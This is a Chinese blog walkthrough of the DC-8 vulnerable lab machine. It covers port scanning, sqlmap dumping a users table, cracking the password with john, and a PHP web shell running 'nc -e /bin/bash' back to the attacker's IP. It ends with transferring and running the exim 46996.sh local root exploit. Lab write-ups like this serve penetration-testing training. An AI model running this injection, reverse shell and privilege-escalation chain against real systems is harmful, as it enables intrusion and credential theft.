DC-8靶机渗透实战

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

#主机探测-端口扫描

arp-scan -l
nmap -F -T4 -sS -sV 192.168.43.12

#指纹识别-目录爆破

whatweb http://192.168.43.12
dirsearch -u http://192.168.43.12

#Web界面-登录界面

/user/login  --登陆界面

#URL存在Sql注入

首页存在sql注入

#Sqlmap梭哈-

库
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D --current-db
表
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' --tables
字段名
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' --columns
字段
sqlmap -u "http://192.168.43.12/?nid=2" --level=5 --risk=3 --batch -D 'd7db' -T 'users' -C 'name,pass,uid' -dump
#得到的账密保存下来--->mima.txt

 

 

 

#john猜解密码

john mima.txt   ---turtle

#web登录john用户-写马

#🐎子在哪里写??
<?php system("nc -e /bin/bash 192.168.43.33 8888");?>
#返回主页提交表单

#反弹shell

kali:
nc -lvvp 8888
python -c "import pty;pty.spawn('/bin/bash')"

#SUID提权-exim

find / -user root -perm -4000 -print 2>/dev/null
#存在exim
exim --version  --4.89

 

#上传46996.sh到靶机

searchsploit exim   ---找本地权限提升的脚本,也就是local privilege esc
cp /usr/....../46996.sh .
nc -lnvp 192.168.43.12 2333 < 46996.sh
靶机:
nc 192.168.43.33 2333 > 46996.sh

 

#运行脚本

cd /tmp
chmod 777 46996.sh
./46996.sh -m netcat

#FLAG

cat flag.txt

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值